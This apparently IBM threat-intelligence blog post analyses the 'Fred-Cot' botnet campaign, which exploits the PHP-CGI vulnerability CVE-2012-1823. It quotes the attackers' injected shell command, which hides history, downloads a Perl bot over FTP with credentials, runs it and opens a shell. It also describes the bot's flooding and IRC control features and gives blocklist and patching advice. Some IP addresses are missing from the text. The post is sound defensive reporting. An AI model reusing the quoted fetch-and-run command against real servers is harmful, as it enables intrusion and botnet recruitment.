As a new addition to our site we will begin to more regularly feature threat analysis from IBM’s Managed Security Services organization.  This team operates a 24/7 Security Operations Center (SOC) on behalf of thousands of clients globally. 

“Fred-Cot” overview

On Saturday, November 2, the IBM SOC detected an active attack attempting to infect several webservers to become part of a botnet.  IBM has identified this attack with the name “Fred-cot.”  “Fred-cot” was part of the FTP URL where the malware repository was located as well as part of the user name / password required to access the site.  The attack, which was active over the weekend but began to taper off earlier this week, is attempting to exploit an older vulnerability in PHP.   It works by attempting to connect to port 80 (web) on a targeted IP and injecting a shell command, which if successful, allows the malware to infect the victim’s system.

Details of the attack

The original attack appeared to originate from the IP address This attack was first spotted by our threat analysts at 7am Eastern on Saturday, November 2nd. IBM is identifying this attack as “Fred-cot.” This address appears to be crawling IP address ranges attempting to connect to port 80 (web) on the targeted IP. Once a connection has been made, the attacking system attempts to inject a shell command. If this command is successfully run on the victim’s system, this malware would connect to via FTP to download gj.exe. Once gj.exe had been downloaded and executed, the victim’s system will be connected to an IRC channel and will wait for further commands.

Site names,,, and all resolve to the address. Activity to and from these site names should be considered suspicious at this time. Site names,,,, and six other hosts resolve to Any activity to or from these sites should be considered especially suspicious. This IP is the repository for the malicious code.

We have seen the following shell injection code being used in this attack:

unset HISTFILE; unset HISTSIZE; uname -a; cd /tmp;wget ftp[COLON]//fredcot[COLON]fredcot123[AT];perl gj.exe;rm -rf gj.exe;w; id; /bin/sh -i’;x0a$daemo appears to be the IP address of the IRC server the malware payload is using as a command and control (C&C) server.

We strongly recommend applying firewall rules to block any access to or from the,, and addresses. Security teams should be aware that IP addresses specified could potentially change. Some anti-virus vendors can detect this malware and it is advisable to verify your software and definition files are up to date.

Malware analysis

This attack appears to be targeting an old vulnerability, CVE-2012-1823, in various versions of PHP paired with Apache web servers. This vulnerability was patched in 5.4.3 and 5.3.13 last year and we covered it in a number of assessments in the months of May and June. This vulnerability deals with an obscure portion of the CGI specification. Other web servers do not adhere to these specifications as Apache does.

The payload of the attack, gj.exe, contrary to implications the name implies, is not a Microsoft executable, it is a Perl script. There were four different variations of the script on the compromised site located at that contained slight differences with the IRC server, ports used, IRC admins, and channels. There were also a number of files containing IP addresses, although their exact use is not known. Other tools located in the directory structure may have been used to generate the list of targets or possibly used in another form of attack.

Once infected and executing the malware, the victim’s system would become just another bot in the botnet. Based on the code, it appears the malware attempts to avoid detection by hiding itself as just another /usr/sbin/sshd process on the system. Connecting back to an IRC server, the victim would wait for commands sent to it through a private message. These commands could include

  • tcpflood used to send packets to a specific host / port combination for a specified time to generate a denial of service condition
  • udpflood used to send packets to a specific host with a designated packet size for a specified time to generate a denial of service condition
  • httpflood used to retrieve the index page of a specific host for a specified time to generate a denial of service condition
  • portscan used to scan a specified list of ports, including 21, 22, 25, and 80, as well as others
  • google used to search Google for references to sites with modules.php installed, possibly used to determine additional vulnerable sites
  • Also included in the code were a number of routines specific to IRC commands, such as connecting to a server, registering with a random nick (vn#### was the pattern used), joining channels, and exiting the IRC server. A subroutine in the malware might have been intended to allow the attacker to execute a remote command on the infected system.

Take action

We strongly suggest that our readers take the time to verify their PHP installations are current and are patched against this old vulnerability. This attack seems to indicate there may be systems facing the Internet that are not. As mentioned before, some anti-virus products do detect this malware. Users should ensure their anti-virus software and associated definition files are up to date. It is also advisable to block traffic to and from the hosts listed below at the perimeter firewalls. Please note, these are the IP addresses we have detected in this wave of attacks and could potentially change in the future.  Administrators should monitor their logs for any suspicious activity.

Current list of hosts that should be blocked due to malicious activity:

  • IPv4: – Original attack vector
  • IPv4: – Reverse shell destination
  • IPv4: – FTP malware repository
  • IPv4: – IRC server used for CnC
  • IPv4: – IRC server used for CnC
  • IPv4: – Additional attack vector
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC

More from Threat Intelligence

“Authorized” to break in: Adversaries use valid credentials to compromise cloud environments

4 min read - Overprivileged plaintext credentials left on display in 33% of X-Force adversary simulations Adversaries are constantly seeking to improve their productivity margins, but new data from IBM X-Force suggests they aren’t exclusively leaning on sophistication to do so. Simple yet reliable tactics that offer ease of use and often direct access to privileged environments are still heavily relied upon. Today X-Force released the 2023 Cloud Threat Landscape Report, detailing common trends and top threats observed against cloud environments over the past…

Email campaigns leverage updated DBatLoader to deliver RATs, stealers

11 min read - IBM X-Force has identified new capabilities in DBatLoader malware samples delivered in recent email campaigns, signaling a heightened risk of infection from commodity malware families associated with DBatLoader activity. X-Force has observed nearly two dozen email campaigns since late June leveraging the updated DBatLoader loader to deliver payloads such as Remcos, Warzone, Formbook, and AgentTesla. DBatLoader malware has been used since 2020 by cybercriminals to install commodity malware remote access Trojans (RATs) and infostealers, primarily via malicious spam (malspam). DBatLoader…

New Hive0117 phishing campaign imitates conscription summons to deliver DarkWatchman malware

8 min read - IBM X-Force uncovered a new phishing campaign likely conducted by Hive0117 delivering the fileless malware DarkWatchman, directed at individuals associated with major energy, finance, transport, and software security industries based in Russia, Kazakhstan, Latvia, and Estonia. DarkWatchman malware is capable of keylogging, collecting system information, and deploying secondary payloads. Imitating official correspondence from the Russian government in phishing emails aligns with previous Hive0117 campaigns delivering DarkWatchman malware, and shows a possible significant effort to induce a sense of urgency as…

Bringing threat intelligence and adversary insights to the forefront: X-Force Research Hub

3 min read - Today defenders are dealing with both a threat landscape that’s constantly changing and attacks that have stood the test of time. Innovation and best practices co-exist in the criminal world, and one mustn’t distract us from the other. IBM X-Force is continuously observing new attack vectors and novel malware in the wild, as adversaries seek to evade detection innovations. But we also know that tried and true tactics — from phishing and exploiting known vulnerabilities to using compromised credentials and…